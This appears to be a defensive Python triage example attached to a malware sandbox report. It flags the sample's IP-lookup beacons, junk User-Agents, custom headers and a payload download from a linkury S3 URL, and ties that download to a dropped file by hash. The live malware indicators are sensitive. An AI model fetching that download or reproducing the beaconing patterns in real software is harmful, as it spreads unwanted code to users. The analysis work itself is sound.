    ddf8c53e1e1888084fa5422f297cc3ba9d97f7576c36f6b633ce67ca789127f7e259e9fb374fcbced66f883dadde0717d81ecce9776770bf07d8cf3b94b1a43f
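Added example, not part of this report and not the sandbox vendor's or the sample's code: a Python triage pass over the HTTP requests in the Network section, with the records hand-copied from this report as constructed sample input. It flags the two external-IP lookup services (ip-api.com and iplogger.org, the behaviour behind the "Looks up external IP address via web service" signature), the junk User-Agent strings (krldn, jdlnb) and the custom request headers (Khsopeyrkdmva, Gkjfdshfkjjd) that make good network-signature material, the Content-Type header the sample sends on body-less GETs, and the PE download from the linkury S3 bucket. It then ties that download to the file in the Downloads section: the S3 ETag 060404f288040959694844afbd102966 equals the MD5 of 7C73.tmp.exe, and Content-Length 152576 is exactly 149 KB. The header whitelist and the User-Agent heuristic are this example's own choices; the report does not define them.

```python
import re
from urllib.parse import urlparse

# Sample data constructed from the HTTP records in this report (hand-copied,
# not a capture): one entry per distinct request, request headers only.
REQUESTS = [
    {"proc": "Archive.zip__ccacaxs2tbz2t6ob3e.exe", "method": "GET",
     "url": "https://iplogger.org/1Wnwe7",
     "headers": {"Khsopeyrkdmva": "hoemckleka", "User-Agent": "krldn",
                 "Cache-Control": "no-cache", "Host": "iplogger.org",
                 "Connection": "Keep-Alive"},
     "resp_type": "image/png"},
    {"proc": "Archive.zip__ccacaxs2tbz2t6ob3e.exe", "method": "GET",
     "url": "http://ip-api.com/xml",
     "headers": {"Content-Type": "text/html", "Khsopeyrkdmva": "hoemckleka",
                 "User-Agent": "krldn", "Host": "ip-api.com",
                 "Cache-Control": "no-cache"},
     "resp_type": "application/xml; charset=utf-8"},
    {"proc": "7C73.tmp.exe", "method": "POST",
     "url": "http://google-analytics.com/collect",
     "headers": {"Content-Type": "text/html", "Gkjfdshfkjjd": "dsdjdsjdhv",
                 "User-Agent": "jdlnb", "Host": "google-analytics.com",
                 "Content-Length": "96", "Cache-Control": "no-cache"},
     "resp_type": "image/gif"},
    {"proc": "Archive.zip__ccacaxs2tbz2t6ob3e.exe", "method": "GET",
     "url": "https://linkury.s3-us-west-2.amazonaws.com/safefinder.exe",
     "headers": {"Accept": "*/*", "Accept-Encoding": "gzip, deflate",
                 "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0)",
                 "Host": "linkury.s3-us-west-2.amazonaws.com",
                 "Connection": "Keep-Alive"},
     "resp_type": "application/x-msdownload",
     "etag": '"060404f288040959694844afbd102966"', "length": 152576},
    {"proc": "Archive.zip__ccacaxs2tbz2t6ob3e.exe", "method": "GET",
     "url": "http://x2.c.lencr.org/",
     "headers": {"Connection": "Keep-Alive", "Accept": "*/*",
                 "User-Agent": "Microsoft-CryptoAPI/10.0", "Host": "x2.c.lencr.org"},
     "resp_type": "application/pkix-crl"},
]

# The dropped file from the Downloads section; the report rounds its size to
# whole KB, so the size check below compares at KB granularity.
DROPPED = {"name": "7C73.tmp.exe", "md5": "060404f288040959694844afbd102966",
           "size_kb": 149}

IP_LOOKUP_SERVICES = {"ip-api.com", "iplogger.org"}   # both seen in this report
# Request headers a real client normally sends; anything else is reported as
# a custom header worth turning into a signature. Whitelist is this example's.
STANDARD_HEADERS = {"Host", "User-Agent", "Accept", "Accept-Encoding",
                    "Content-Type", "Content-Length", "Cache-Control",
                    "Connection", "Cookie"}
# Heuristic: a short run of lowercase letters with no product/version token.
JUNK_UA = re.compile(r"[a-z]{3,12}")


def triage_request(req):
    """Return the list of findings for one request (empty if it looks benign)."""
    findings = []
    if urlparse(req["url"]).hostname in IP_LOOKUP_SERVICES:
        findings.append("external-ip-lookup")
    ua = req["headers"].get("User-Agent", "")
    if JUNK_UA.fullmatch(ua):
        findings.append("junk-user-agent:" + ua)
    for name in req["headers"]:
        if name not in STANDARD_HEADERS:
            findings.append("custom-header:" + name)
    if req["method"] == "GET" and "Content-Type" in req["headers"]:
        findings.append("content-type-on-bodyless-get")
    if req["resp_type"].startswith("application/x-msdownload"):
        findings.append("pe-download")
    return findings


def s3_etag_md5(etag):
    """S3 serves the object's MD5 as the ETag only for single-part uploads not
    encrypted with SSE-KMS/SSE-C; multipart ETags carry a '-N' suffix.
    Returns the hex MD5, or None when the ETag cannot be used as one."""
    value = etag.strip('"')
    return value if re.fullmatch(r"[0-9a-f]{32}", value) else None


def download_matches_drop(req, dropped):
    """True when the served object's ETag and size agree with the dropped file."""
    md5 = s3_etag_md5(req.get("etag", ""))
    if md5 is None or "length" not in req:
        return False
    return md5 == dropped["md5"] and round(req["length"] / 1024) == dropped["size_kb"]


def triage(requests, dropped):
    """Map each suspicious URL to its findings; benign background traffic such
    as the CryptoAPI CRL fetch produces no entry."""
    report = {}
    for req in requests:
        findings = triage_request(req)
        if "pe-download" in findings and download_matches_drop(req, dropped):
            findings.append("matches-dropped:" + dropped["name"])
        if findings:
            report[req["url"]] = findings
    return report


if __name__ == "__main__":
    for url, findings in triage(REQUESTS, DROPPED).items():
        print(url, "->", ", ".join(findings))
```

The ETag check is deliberately conservative: a multipart or KMS-encrypted object yields an ETag that is not an MD5, and s3_etag_md5 returns None for it rather than reporting a false mismatch. When the ETag does match, as it does here, the dropped 7C73.tmp.exe is the safefinder.exe object fetched from the bucket, with no re-packing in between.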
